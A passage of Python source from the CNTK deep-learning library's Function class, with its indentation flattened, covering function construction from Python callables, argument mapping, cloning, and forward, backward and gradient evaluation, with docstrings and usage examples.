var_type = Variable._Type._sanitize(var_type)
if isinstance(var_type, Variable._Type):
return cntk.input_variable(name=name, **var_type)
else:
return placeholder(name=name)
from ..default_options import default_options
# Parameter() creation inside code of a Function def is forbidden. Setting 'pure' blocks it in Parameter().
with default_options(pure=True):
# get the parameter list through inspection
arg_names, annotations = get_python_function_arguments(f)
# The Python function is converted to a CNTK Function by executing it once
# passing placeholders as inputs. This creates a piece of graph.
# During execution, the Placeholders of this function are hidden from signatures of any
# further Functions that may be defined inside this invocation.
# This is required when @Function definitions are nested, and expression from
# the outer @Function block is used in an inner block, which would introduce
# additional Placeholders that will show up as .arguments.
# This is prevented by (1) maintaining a "invisible placeholders" list,
# and always filtering .arguments against that list. This is done by the property .signature;
# i.e. in all of this, do not use .arguments; use .signature instead.
from .. import combine, alias, as_block
args = [make_arg_variable(arg_name, annotations) for arg_name in arg_names]
# helpers
def force_order_args(fun_args):
block_args = [placeholder(name=fun_arg.name) for fun_arg in fun_args] # placeholders inside the BlockFunction
combined_block_args = combine(block_args) # the content of the BlockFunction
arg_map = list(zip(block_args, fun_args)) # after wrapping, the block_args map to args
return as_block(composite=combined_block_args, block_arguments_map=arg_map, block_op_name='Tuple').outputs
def invoke(fun_args):
try:
# hide Placeholders of this function from .signature() of any function defined inside
for arg in args:
Function._placeholders_under_construction.add(arg)
out = f(*fun_args)
if out is None:
raise TypeError("CNTK Function '{}' must return a value".format(f_name))
finally:
# unhide Placeholders of this function again
for arg in args:
Function._placeholders_under_construction.remove(arg)
# resolve tuples and NamedOutputs --TODO: check for duplicates
def resolve_named(output):
#if isinstance(output, Function.NamedOutput): # a tuple member is wrapped in a NamedOutput class, we got a name for it
# output = alias(output.arg, name=output.name)
# ^^ TODO: Complete the design for name-accessible .outputs, then bring this back.
if isinstance(output, cntk_py.Variable):
output = combine([output]) # workaround: wrap in another combine() call
# TODO: ^^ is this still necessary? Or is this a sanitize() call we need here?
return output
if isinstance(out, tuple): # multi-valued function, returned as a tuple
out = [resolve_named(output) for output in out]
# BUGBUG: combine() does not allow duplicates, so we wrap them in alias()
out_seen = set()
for i, out_i in enumerate(out):
if out_i in out_seen:
out[i] = alias(out_i)
else:
out_seen.add(out_i)
out = combine(out) # --> turn into a combine()
else:
out = resolve_named(out)
return out
# if called from BlockFunction() then wrap into a block
if make_block: # if we make a block then run off a separate set
block_args = [make_arg_variable(arg.name, annotations) for arg in args] # placeholders inside the BlockFunction
out = invoke(block_args)
out = as_block(composite=out, block_arguments_map=list(zip(block_args, args)), block_op_name=op_name, block_instance_name=name)
# not a block: ensure parameter ordering
else:
fun_args = args
#if len(fun_args) > 1:
# fun_args = force_order_args(fun_args)
# BUGBUG: Python interpreter crashes sometimes with this enabled, so for now fix it after the fact only if needed
# now invoke the Python function
out = invoke(fun_args)
# BUGBUG workaround: fix it after the fact with an inefficient solution only if we got it wrong
out_arg_names = [arg.name for arg in out.signature]
if set(out_arg_names) == set(arg_names) and out_arg_names != arg_names: # order came out wrong
fun_args = force_order_args(fun_args)
out = invoke(fun_args)
# verify that we got the parameter order right
out_arg_names = [arg.name for arg in out.signature]
assert out_arg_names == arg_names
if len(out.signature) != len(args):
unfulfilled_args = set(out.signature) - set(args)
if unfulfilled_args:
unfulfilled_arg_names = [arg.name for arg in unfulfilled_args]
raise TypeError("CNTK Function '{}' has {} missing arguments ({}), which is currently not supported".format(f_name, len(unfulfilled_arg_names), ", ".join(unfulfilled_arg_names)))
else:
unused_args = set(args) - set(out.signature)
unused_arg_names = [arg.name for arg in unused_args]
raise TypeError("CNTK Function '{}' has {} unused arguments ({}), which is currently not supported".format(f_name, len(unused_arg_names), ", ".join(unused_arg_names)))
return out
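# Illustrative sketch (not part of the implementation): the machinery above is what
# makes the public @Function decorator work. Assuming cntk is importable as C, a
# typical use looks like this:
#
#   import cntk as C
#   @C.Function
#   def add(x, y):
#       return x + y
#   print(add)   # Plus(x: Sequence[tensor], y: Sequence[tensor]) -> Sequence[tensor]
#
# The two Python parameters become the CNTK Function's signature, in declaration order.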
@property
def signature(self):
'''
Returns the signature of a Function.
This is the .arguments[] list without placeholders that belong to an outer, not yet completed @Function def.
'''
sig = [arg for arg in self.arguments if arg not in Function._placeholders_under_construction]
return tuple(sig)
def argument_map(self, *args, **kwargs):
'''
Determines the {placeholder: variable} map for use with various call operations
Returns a dictionary from this function's placeholders to whatever arguments are passed.
Accepted are both positional and keyword arguments.
This mimics Python's argument interpretation, except that keyword arguments are not optional
(there is no concept of default value).
This does not require the arguments to be Variables or Functions. It is also called by train_minibatch().
'''
params = self.signature # function parameters
if len(args) + len(kwargs) != len(params):
raise TypeError("CNTK Function expected {} arguments, got {}".format(len(params), len(args) + len(kwargs)))
params_dict = { arg.name: arg for arg in params }
return map_function_arguments(params, params_dict, *args, **kwargs)
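# Hedged usage sketch for argument_map() (function and values chosen for illustration only):
#
#   import cntk as C
#   @C.Function
#   def f(x, y):
#       return x + y
#   arg_map = f.argument_map(1, y=2)   # maps f's 'x' parameter to 1 and 'y' to 2
#
# Positional and keyword arguments are matched against the signature in declaration
# order; each parameter must be bound exactly once.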
@staticmethod
def _replace_args_type_check(arg_map): # type: (Dict[param: Variable, arg: Variable]), param meant to be substituted by arg
'''
Performs a type-compatibility check for arguments to replace_placeholders() and clone(),
in order to output an actionable error message in case of an error.
'''
for i, arg_map_item in enumerate(arg_map.items()):
param = arg_map_item[0] # parameter = what gets substituted
arg = arg_map_item[1] # argument = what it gets substituted with
#print('checking param', param.name, 'against arg', arg.name)
param_type = param._type
arg_type = arg._type if isinstance(arg, cntk_py.Variable) else arg.output._type if isinstance(arg, Function) else None
def param_name(): # helper to get a descriptive name for param
if param.name:
return "argument %s" % param.name
else:
return 'positional argument %d' % i
if not arg_type:
raise TypeError(param_name() + " was passed an object that is not a Variable or Function")
# parameter shape is not yet known, any input is acceptable
if not param_type.shape_is_known or param.is_placeholder:
# Note: if a Function with known inputs gets cloned while replacing the inputs
# with placeholders, those placeholders retain their shapes for some reason.
# But in this case, it should be allowed to replace them with mismatching dimensions,
# hence we do not test placeholders, only inputs.
# TODO: Should clone-replacing inputs with placeholders reset the shapes to unknown?
continue
if not arg_type.shape_is_known:
raise TypeError(param_name() + ' has a known shape, and cannot be passed a Variable of unknown shape')
# TODO: add tests for this complex condition
if len(arg_type.shape) < len(param_type.shape) or \
arg_type.shape[-len(param_type.shape):] != param_type.shape or \
(arg_type.dynamic_axes and arg_type.dynamic_axes != param_type.dynamic_axes) or \
arg_type.dtype != param_type.dtype or \
arg_type.is_sparse != param_type.is_sparse:
raise TypeError(param_name() + "'s type " + str(param_type) + " is incompatible with the type " + str(arg_type) + " of the passed Variable")
def update_signature(self, *arg_types, **kwarg_types):
'''
Defines input shapes, in-place, e.g. ``model.update_signature(42)``.
Pass one object per Function argument that defines its dimensions etc.
Currently you can pass an int, a tuple, an Input, or a dict created with Type().
'''
arg_map = self.argument_map(*arg_types, **kwarg_types) # map type specs to Function parameters
def to_input(arg_type, name):
#from cntk import input
from ..variables import Variable
if isinstance(arg_type, (int, tuple)): # just passed a shape
return cntk.input_variable(shape=_as_tuple(arg_type), name=name)
arg_type = Variable._Type._sanitize(arg_type)
if isinstance(arg_type, Variable._Type): # full type given as Tensor[...] etc.
return cntk.input_variable(name=name, **arg_type)
raise TypeError("update_signature() expects arguments of type int, tuple of int, or Type.Variable")
# map the given types:
# - create an Input with the given Type or shape
# - keep the name property of the Function parameter
# - skip argument types passed as None
arg_map = { param: to_input(arg_type, name=param.name) for param, arg_type in arg_map.items() if arg_type is not None }
Function._replace_args_type_check(arg_map)
self.replace_placeholders(arg_map)
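# Hedged usage sketch for update_signature(), assuming a generic @Function whose
# argument starts out as an untyped placeholder (the shape 13 is arbitrary):
#
#   import cntk as C
#   from cntk.layers.typing import Tensor
#   @C.Function
#   def f(x):
#       return x * x
#   f.update_signature(Tensor[13])   # equivalently: f.update_signature(13)
#   # f's argument 'x' is now a 13-dimensional input instead of an untyped placeholder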
def declare_args(self, *arg_types):
'''
Back-compat wrapper for update_signature() (beta12 and before).
'''
warnings.warn('This will be removed in future versions. Please use '
'update_signature(...) instead', DeprecationWarning)
placeholders = self.placeholders # the unbound parameters to fill in
if len(arg_types) != len(placeholders):
raise TypeError("CNTK Function.declare_args() expected {} arguments, got {}".format(len(placeholders), len(arg_types)))
def to_input(arg):
if isinstance(arg, cntk_py.Variable):
return arg
else:
#from cntk import input
return cntk.input_variable(arg)
args = [to_input(arg) for arg in arg_types]
arg_map = dict(zip(placeholders, args))
Function._replace_args_type_check(arg_map)
self.replace_placeholders(arg_map)
def __call__(self, *args, **kwargs):
'''
Call a Function, either on symbolic or numeric inputs.
* If at least one input is a CNTK Function or Variable, then
result is a CNTK Function object, with inputs bound to the arguments.
This is a short-hand for `f.clone(share, argument_map(*args, **kwargs))`.
* Otherwise, all arguments must be numbers, numpy arrays, or a :class:`~cntk.io.MinibatchData` instance.
Then perform the actual computation and return the numeric result.
This is a short-hand for `f.eval(argument_map(*args, **kwargs))`,
except that there is no `device` parameter. If you need that, use `eval()` directly.
Args:
*args, **kwargs: The arguments to pass to the Function.
Returns:
In case of symbolic inputs, returns another CNTK Function object with inputs bound to the arguments.
Otherwise returns a tuple of numpy arrays for tuple-valued Functions, and a single numpy array otherwise.
'''
# parse argument list and map to the function's input
arg_map = self.argument_map(*args, **kwargs)
# if placeholders were excluded due to being under construction,
# we must include them in the argmap, otherwise they will be cloned
for arg in self.arguments:
if arg not in arg_map:
arg_map[arg] = arg
# determine whether this is eval() or clone()
is_symbolic = any(isinstance(arg, (cntk_py.Function, cntk_py.Variable)) for arg in arg_map.values())
# symbolic: return a cloned Function
# applying the function means to inline its piece of graph
if is_symbolic:
Function._replace_args_type_check(arg_map)
return self.clone(CloneMethod.share, arg_map)
# numeric: evaluate
outputs = self.outputs
_, output_map = self.forward(arg_map, outputs)
assert len(output_map) == len(outputs)
if len(output_map) > 1: # tuple-valued: return tuple
return tuple(output_map[output] for output in outputs)
else: # single value: return numpy array and that's it
return list(output_map.values())[0]
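# Hedged sketch of the two call modes described above (values are arbitrary):
#
#   import numpy as np
#   import cntk as C
#   x = C.input_variable(3)
#   f = C.sigmoid(x)
#   # numeric call: evaluates immediately and returns a NumPy array
#   f(np.zeros((1, 3), dtype=np.float32))          # ~ [[0.5, 0.5, 0.5]]
#   # symbolic call: binds the argument to another CNTK expression and returns
#   # a new Function (short-hand for clone(share, ...))
#   g = f(C.input_variable(3, name='other'))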
# TODO: remove the parallel application; instead
# - function tuples always operate on all inputs, just as if they were a single function
# - parallel application would be done by nested Sequential or >> expressions
# - we also need to rethink Sequential() for the case that the first function passed to
# it accepts multiple arguments. That should just become the returned composite's signature.
# It naturally would if we just passed it on to Function, but in case of a tuple, we'd need
# to create intermediate placeholders so that all functions in the tuple get to share the inputs.
def __rshift__(self, other):
'''
Forward function composition (G o F), same as Sequential([F, G]).
Unlike __call__(), __rshift__() accepts tuples:
* `G` can be a tuple of Functions. They are applied in parallel, yielding a tuple result.
If `F` is a single-valued Function, it will be fed to all items.
* if `F` is a tuple-valued Function and `G` is a single Function, the tuple
values will be used as the arguments to `G`.
* if both are tuples, they are applied 1:1
E.g. `Embedding(500) >> (Recurrence(500), Recurrence(500, go_backwards=True)) >> splice >> Dense`
'''
inputs = self.outputs
input_is_tuple = len(inputs) > 1
# if piping into a tuple of Functions, apply item-wise
if isinstance(other, tuple):
from cntk import combine
return combine([other[i](inputs[i if input_is_tuple else 0]) for i in range(len(other))])
# if applying a single function to a tuple-valued Function, pass the items as the args
elif input_is_tuple:
return other(*inputs)
# regular case: one input, one Function
else:
return other(self)
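# Hedged composition sketch using >> (layer sizes are arbitrary):
#
#   import cntk as C
#   model = C.layers.Embedding(300) \
#           >> C.layers.Recurrence(C.layers.LSTM(128)) \
#           >> C.layers.Dense(10)
#   # equivalent to C.layers.Sequential([Embedding(300), Recurrence(LSTM(128)), Dense(10)])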
def __lshift__(self, other):
'''
Backward function composition (self o other)
'''
return self(other)
def __getattr__(self, name):
'''
Access a member inside this object.
Members of ``Function`` can be accessed directly.
In addition, members of the Function's output, if only one, are accessed here.
Lastly, this also gives access to Functions and Variables inside this Function's
graph by their user-specified name, e.g. ``model.embed.E``, as long as those names are not also
member names of Function or Variable.
'''
# If name is not a member of Function or Variable, first look for
# a user-named item in the graph.
# (Known member names cannot be overridden by user-named items,
# to ensure that the API functions.)
if not hasattr(Variable, name) and not hasattr(Function, name) \
and not name.startswith('_') and name not in ['outputs', 'output', 'this']:
# lookup of a named object inside the graph
# When 'self' is a BlockFunction (e.g. a named layer), then we only search in there,
# while when 'self' is a regular node (e.g. a named output using Label),
# we search the composite, which may return multiple hits with the same name.
# In case of multiple matches, we fail.
# BUGBUG: That is a problem if, e.g., someone used a layer (=BlockFunction) twice
# and then looks it up by name, as that will fail although both instances are identical.
from cntk.logging.graph import find_by_name
root = self.block_root if self.is_block else self
item = typemap(find_by_name)(root, name, depth=1)
if item:
return item
# If something is not found in Function, look it up in its output
# variable, if it has only one.
if name.startswith('_') or name in ['outputs', 'output', 'this']:
# These should not be looked up in self's output.
# 'outputs' and 'output' are required to fetch the attribute
# from the Variable.
# 'this' is required for Swig and needs to be thrown if the
# object is created the first time.
raise AttributeError("neither Function nor its output variable"
" has '%s'"%name)
# access an API member of 'output', such as .shape()
outputs = self.__getattribute__('outputs')
if len(outputs) != 1:
raise AttributeError("Function does not have '%s' and it cannot "
"be looked up in its outputs because it does not have "
"exactly one"%name)
return getattr(outputs[0], name)
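# Hedged sketch of name-based lookup via __getattr__ ('embed' is a user-chosen
# layer name; 'E' is the Embedding layer's parameter name):
#
#   import cntk as C
#   model = C.layers.Sequential([C.layers.Embedding(50, name='embed'),
#                                C.layers.Dense(10)])
#   model.embed      # the Embedding block, found by its user-specified name
#   model.embed.E    # the embedding weight Parameter inside that block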
@property
def type(self):
'''
Get type of a Function's output.
'''
return self.output.type
@property
@typemap
def arguments(self):
'''
List of all input variables of the Function that are not of type Parameter or Constant
'''
return super(Function, self).arguments()
@property
@typemap
def attributes(self):
'''
List of the attributes of the function
'''
return sanitize_Function_attributes(super(Function, self).attributes())
def set_attribute(self, name, value):
'''
Allows changing a function attribute.
Args:
name (string): one of
* 'dropoutRate': modifies the dropout rate of a dropout function
(can only be invoked on a function instance returned either from
:func:`~cntk.ops.dropout` or :func:`find_by_name`).
* 'rngSeed': modifies the seed of a stateful function (can only be
invoked on function instance returned from :func:`~cntk.ops.dropout`,
:func:`~cntk.ops.random_sample`,
:func:`~cntk.ops.random_sample_inclusion_frequency` or :func:`find_by_name`)
value (float in case of 'dropoutRate', int for 'rngSeed'): the new value
of the corresponding attribute.
'''
value = _to_cntk_dict_value(value)
return super(Function, self).set_attribute(name, value)
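# Hedged sketch for set_attribute() (rate values are arbitrary):
#
#   import cntk as C
#   d = C.dropout(C.input_variable(10), dropout_rate=0.5)
#   d.set_attribute('dropoutRate', 0.25)   # lower the dropout rate after construction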
@typemap
def clone(self, method, substitutions=None):
'''
Clones the function. The parameters of the Function are either cloned,
shared or frozen as specified by the method argument and any variable
substitutions requested are applied in the cloned Function instance.
Args:
method (:class:`CloneMethod`): one of
* 'clone': the returned function gets its own copy of parameters (default)
* 'share': the returned function shares its parameters with this function
* 'freeze': parameters are cloned and made immutable (constant).
substitutions (dict): a dictionary mapping variables in this
function to variables in the cloned function
Returns:
:class:`~cntk.ops.functions.Function`: the cloned Function
'''
# C++ clone() can only clone composites. If we are not a composite, make it one using combine()
if not self.is_composite:
from cntk import combine
return combine([self]).clone(method, substitutions)
method = getattr(cntk_py,
'ParameterCloningMethod_' + CloneMethod(method).name.capitalize())
substitutions = substitutions or {}
if not isinstance(substitutions, dict):
raise TypeError("Variable substitution map must be a dictionary")
return super(Function, self).clone(method, substitutions)
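# Hedged transfer-learning sketch for clone(): freeze a trained model's parameters
# and re-bind its input to a fresh placeholder ('model' is assumed to be a
# previously trained single-input Function):
#
#   import cntk as C
#   ph = C.placeholder(name='new_input')
#   frozen = model.clone('freeze', {model.arguments[0]: ph})
#   # 'frozen' has the same structure, but its parameters are now immutable constants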
@property
@typemap
def constants(self):
'''
List of all `Constant` variables of this :class:`~cntk.ops.functions.Function`
'''
return super(Function, self).constants()
def eval(self, arguments=None, outputs=None, device=None, as_numpy=True):
'''
Evaluate the Function's outputs using the specified ``arguments`` as input.
Args:
arguments: maps variables to their input data. The interpretation depends on
the input type:
* dict: keys are input variable or names, and values are the input data.
See :meth:`~cntk.ops.functions.Function.forward` for details on passing
input data.
* any other type: if node has a unique input, arguments is
mapped to this input.
For nodes with more than one input, only dict is allowed.
In both cases, every sample in the data will be interpreted
as a new sequence.
Sequences can be marked as continuations of the same sequence in
the previous minibatch (that is the sequence in the same slot).
There are two possibilities for this:
* specifying arguments as a `tuple` where the first element is
used as arguments and the second one will be used as a list
of bools, denoting whether a sequence is a new one (`True`) or a
continuation of the sequence in the same slot of the previous
minibatch (`False`). This will be applied to all batches.
* specifying arguments as a dictionary of variables to tuples
where the first element is used as arguments and the second
one will be used as a list of bools, denoting whether a sequence
is a new one (`True`) or a continuation of the sequence in the
same slot of the previous minibatch (`False`). This will be
applied to all batches.
Data should be either NumPy arrays or a
:class:`~cntk.io.MinibatchData` instance.
outputs (iterable, optional): outputs to fetch values for. If not
set, all outputs of the function will be fetched.
device (:class:`~cntk.device.DeviceDescriptor`): the device descriptor that
contains the type and id of the device on which the computation is
to be performed.
as_numpy (bool): whether to return the result as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporary Value objects if they need to be accessed later.
Note:
See :meth:`~cntk.ops.functions.Function.forward` for examples on
passing input data.
Returns:
dict or NumPy Array: Dict with keys of output variable names and values of
output variables. A single NumPy array if there is only one output value.
'''
if outputs is None:
outputs = self.outputs
_, output_map = self.forward(arguments, outputs, device=device, as_numpy=as_numpy)
return sanitize_variable_value_dict(output_map)
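# Hedged sketch for eval() (values are arbitrary):
#
#   import numpy as np
#   import cntk as C
#   x = C.input_variable(2)
#   f = C.softmax(x)
#   f.eval({x: np.array([[1., 2.]], dtype=np.float32)})
#   # with a single input, the dict may be dropped:
#   f.eval(np.array([[1., 2.]], dtype=np.float32))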
@typemap
def forward(self, arguments, outputs=None, keep_for_backward=None, device=None, as_numpy=True):
'''
Computes the values of specified variables in ``outputs``, using values
provided in ``arguments`` that correspond to each input `Variable` of
the function (i.e. those that have ``is_input = True``).
Example:
>>> # Example of passing dense data
>>> v = C.input_variable(shape=(3,))
>>> f = C.reciprocal(v)
>>> _, fv = f.forward({v:[[1, 2, 4]]})
>>> list(fv.values())[0]
array([[ 1. , 0.5 , 0.25]], dtype=float32)
Example:
>>> # Passing sparse values as one-hot with a vocabulary size of 5
>>> vocab_size = 5
>>> v = C.sequence.input_variable(shape=(vocab_size,), is_sparse=True)
>>> f = C.times(v, np.eye(vocab_size))
>>> # Passing a batch of two sequences:
>>> # 1st sequence: word 1
>>> # 2nd sequence: words 2 and 4
>>> batch = [[1],[2,4]]
>>> sparse_batch = C.Value.one_hot(batch, vocab_size)
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
Example:
>>> # Doing the same, but with a CSR matrix from scipy.sparse
>>> vocab_size = 5
>>> from scipy.sparse import csr_matrix
>>> v = C.sequence.input_variable(shape=(vocab_size,), is_sparse=True)
>>> f = C.times(v, np.eye(vocab_size))
>>> # Note that csr_matrix automatically uses a sparse representation underneath.
>>> sparse_batch = [csr_matrix([[0,1,0,0,0]]), csr_matrix([[0,0,1,0,0], [0,0,0,0,1]])]
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
<BLANKLINE>
>>> # Much more efficient, however, is to incrementally create CSR arrays.
>>> # See https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csr_matrix.html
>>> # for more information.
>>> def seq_to_csr_matrix(seq, vocab_size):
... indptr = [0]
... indices = []
... data = []
... for term_idx in seq:
... indices.append(term_idx)
... data.append(1)
... indptr.append(len(indices))
... return csr_matrix((data, indices, indptr), shape=(len(seq), vocab_size))
>>> sparse_batch = [seq_to_csr_matrix(seq, vocab_size) for seq in batch]
>>> _, fv = f.forward({v:sparse_batch})
>>> list(fv.values())[0]
[array([[ 0., 1., 0., 0., 0.]], dtype=float32),
array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.]], dtype=float32)]
Args:
arguments: maps variables to their input data. The interpretation depends on
the input type:
* dict: keys are input variable or names, and values are the
input data. To specify a minibatch, provide a list of arrays.
The shape of each array must be compatible with the shape of
the dictionary key. If the array denotes a sequence then the
elements of the sequence are grouped along axis 0.
* any other type: if node has a unique input, arguments is
mapped to this input.
For nodes with more than one input, only dict is allowed.
In both cases, every sample in the data will be interpreted
as a new sequence.
Sequences can be marked as continuations of the same sequence in
the previous minibatch (that is the sequence in the same slot).
There are two possibilities for this:
* specifying arguments as a `tuple` where the first element is
used as arguments and the second one will be used as a list
of bools, denoting whether a sequence is a new one (`True`) or a
continuation of the sequence in the same slot of the previous
minibatch (`False`). This will be applied to all batches.
* specifying arguments as a dictionary of variables to tuples
where the first element is used as arguments and the second
one will be used as a list of bools, denoting whether a sequence
is a new one (`True`) or a continuation of the sequence in the
same slot of the previous minibatch (`False`). This will be
applied to all batches.
Data should be either NumPy arrays or a
:class:`~cntk.io.MinibatchData` instance.
outputs (iterable, optional): outputs to fetch values for. If not
set, all outputs of the function will be fetched.
keep_for_backward (set, default `None`): the subset of the
Function's output variables for which gradients shall be calculated
in a subsequent backward call. If `None`, the returned state will
be `None` and a subsequent call to :func:`backward` will not be
possible.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is. If `None`, the default device is used.
as_numpy (bool): whether to return the result as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporary Value objects if they need to be accessed later.
Returns:
A tuple (BackPropState, map of outputs to NumPy arrays). The
BackPropState is a handle taken by :func:`backward`.
'''
if device is None:
device = DeviceDescriptor.use_default_device()
in_var_map = sanitize_var_map(self.arguments, arguments,
None, device)
if outputs is None:
outputs = self.outputs
else:
outputs = sanitize_variables_or_functions(outputs)
output_map = {v: None for v in outputs}
keep_for_backward = set(keep_for_backward or {})
state = super(Function, self)._forward(in_var_map, output_map, device,
keep_for_backward)
if as_numpy:
for k, v in output_map.items():
output_map[k] = _value_as_sequence_or_array(v, k)
return state, output_map
@typemap
def backward(self, state, root_gradients, variables, as_numpy=True):
'''
Backpropagates supplied ``root_gradients`` for one or more of the output
variables of the Function, to calculate gradients with respect to
``variables``. Formally, multiplies the values of ``root_gradients`` by
the Jacobian of the Function and returns the subset of the output that
corresponds to ``variables``.
Example:
>>> # compute the value and the derivative of the sigmoid at 0
>>> v = C.input_variable(shape=(1,), needs_gradient=True)
>>> f = C.sigmoid(v)
>>> df, fv = f.forward({v:[[0]]}, [f.output], set([f.output]))
>>> value = list(fv.values())[0]
>>> grad = f.backward(df, {f.output: np.ones_like(value)}, set([v]))
>>> value
array([[ 0.5]], dtype=float32)
>>> list(grad.values())[0]
array([[ 0.25]], dtype=float32)
Args:
state (BackPropState): state obtained from a previous call to the
func:`cntk.ops.Function.forward` method on this Function for the
computation that this gradient backpropagation corresponds to.
root_gradients (dict): the gradients that will be backpropagated
variables (set): a list of input variables with respect to which
the gradients have to be computed.
as_numpy (bool): whether to return the gradients as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporary Value objects if they need to be accessed later.
Note:
See :meth:`~cntk.ops.functions.Function.forward` for more examples
on passing input data.
Returns:
dict: mapping of ``variables`` to NumPy arrays
'''
if state is None:
raise ValueError('You are attempting to backpropagate on a '
'minibatch for which the corresponding forward operation did not '
'keep any intermediate results. Please set keep_for_backward in '
'forward to the variables in root_gradients.keys()')
device = state.device()
root_gradients = sanitize_var_map(self.outputs, root_gradients,
None, device)
var_gradients = {var: None for var in variables}
self._backward(state, root_gradients, var_gradients)
if as_numpy:
for var, value in var_gradients.items():
var_gradients[var] = _value_as_sequence_or_array(value, var)
return var_gradients
@typemap
def grad(self, at, wrt=None, outputs=None, device=None, as_numpy=True, grad_root=None):
'''
Computes the gradient of this Function at location ``at`` with respect to ``wrt``.
The Function must have a single output.
Example:
>>> x = C.input_variable(shape=(1,), needs_gradient=True)
>>> y = C.sqrt(x)
>>> a = np.asarray([1,4,16],dtype=np.float32).reshape(3,1)
>>> y.grad({x:a})
array([[ 0.5 ],
<BLANKLINE>
[ 0.25 ],
<BLANKLINE>
[ 0.125]], dtype=float32)
Args:
at (dict) : mapping of the Function's arguments to values
wrt (list, default `None`): list of Variables with respect to which the
gradient will be computed. If omitted, the gradients with
respect to all arguments of this Function that need gradient will be computed.
outputs (iterable, optional): outputs (including intermediate outputs in the graph)
to fetch values for. If not specified, values for none of the outputs are fetched.
device (:class:`~cntk.device.DeviceDescriptor`, default `None`): the device
descriptor that contains the type and id of the device on which the
computation is performed. If `None`, the default device is used.
as_numpy (bool, default `True`): whether to return the gradients as a NumPy array. Default True.
Specifying this as False returns a CNTK Value which avoids a
costly conversion but returns a somewhat opaque object. Also, the Value objects
are temporary and only guaranteed to be valid until the next forward/eval/backward/grad call.
You must explicitly clone the temporary Value objects if they need to be accessed later.
grad_root (:class:`~cntk.variables.Variable`, optional): specify the root of gradients calculation.
If not specified, the output of this function will be used as gradient root.
Returns:
dict or NumPy Array or a tuple of these: Dict with keys of ``wrt`` variables and gradient values of
``wrt`` variables. A single NumPy array if there is only one gradient value.
If ``outputs`` were specified (to fetch values for), this method returns a tuple where the 2nd element
of the tuple is the ``outputs`` values; a dict with keys of specified ``outputs`` variables and
values of computed ``outputs``, or a single NumPy array if there is only one output value.
Each element has the same shape as the ``wrt`` or ``outputs`` variables including dynamic axes
(such as the batch axis).
'''
if device is None:
device = DeviceDescriptor.use_default_device()
in_var_map = sanitize_var_map(self.arguments, at, None, device)
if outputs is None:
outputs = []
if wrt is None:
wrt = [arg for arg in self.arguments if arg.needs_gradient]
if len(wrt) == 0:
raise ValueError("None of the Function '%s' arguments have 'needs_gradient == True'" % str(self))
output_map = {v: None for v in outputs}
wrt_map = {v: None for v in wrt}
if grad_root is None:
super(Function, self).gradients(in_var_map, wrt_map, output_map, device)
else:
super(Function, self).gradients(in_var_map, grad_root, wrt_map, output_map, device)
if as_numpy:
for k in output_map:
output_map[k] = _value_as_sequence_or_array(output_map[k], k)
for k in wrt_map:
wrt_map[k] = _value_as_sequence_or_array(wrt_map[k], k)
if len(output_map) == 0:
return sanitize_variable_value_dict(wrt_map)
else:
return sanitize_variable_value_dict(wrt_map), sanitize_variable_value_dict(output_map)
@property
@typemap
def inputs(self):
'''
List of variables that are inputs of this function.
Note that 'inputs' here denotes all Variables that feed into this Function
including any Parameter/Constant Variables that are children of this Function.
'''
return super(Function, self).inputs(True)
@property
def name(self):
'''
Name of this function
Args:
getter (str): returns the name of the function.
setter (str): sets the name of the function. Setting the name of a
Function is only allowed if the Function does not already have a
name. Calling this method, when this Function already has a name,
results in an exception.
'''
return super(Function, self).name()
@name.setter
def name(self, function_name):
super(Function, self).set_name(function_name)
@property
def op_name(self):
'''
Name of the operation that this Function performs
'''
return super(Function, self).op_name()
@property
@typemap
def output(self):
'''
The single output variable if there is only one, or raises an exception.
'''
return super(Function, self).output()
@property
@typemap
def outputs(self):
'''
List consisting of all output variables of this function.
'''
return super(Function, self).outputs()
@property
@typemap
def parameters(self):
'''
List of all parameter variables of this function.
'''
return super(Function, self).parameters()
@property
@typemap
def placeholders(self):
'''
List of all placeholder variables of this function.
'''
return super(Function, self).placeholders()
@property
@typemap
def root_function(self):
'''
The primitive function at the root of the graph of functions underlying this function.
'''
return super(Function, self).root_function()
@property
def is_primitive(self):
'''
Returns a boolean indicating if this Function is a primitive Function.
A primitive Function is the lowest level building block for composite Function
graphs and is either a CNTK built-in operator, a composite Function encapsulated
as a Block, or a user-defined Function.
'''
return super(Function, self).is_primitive()
@property
def is_composite(self):
'''
Returns a boolean indicating if this Function is a composite Function.
A composite Function is a Function that is composed of primitive Functions.
'''
return super(Function, self).is_composite()
@property
def is_block(self):
'''
Returns a boolean indicating if this Function is a block Function, i.e. a
composite encapsulated as an opaque block which appears as a primitive when
traversing the graph of Functions that this block is part of.
'''
return super(Function, self).is_block()
@property
@typemap
def block_root(self):
'''
Returns the root of the Function graph underlying this block Function.
Throws an exception if this is not a block Function.
'''
return super(Function, self).block_root()
@property
@typemap
def block_arguments_mapping(self):
'''
Returns the mapping from the arguments of the composite underlying this block function
to the Variables that they are bound to in the outer graph of Functions that this
block Function is part of.
'''
return super(Function, self).block_arguments_mapping()
@property
@typemap
def uid(self):
'''
The internally generated unique name of the function.
'''
return super(Function, self).uid()
def __str__(self):
'''
Describes the Function and its signature as a string.
Example:
>>> f = C.log(C.input(1), name='f') # Function constructed as a graph
>>> print(f)
f: Log(Tensor[1]) -> Tensor[1]
>>> d = C.layers.Dense(10) # Function constructed as a layer
>>> print(d)
Dense(x: Sequence[tensor]) -> Sequence[tensor]
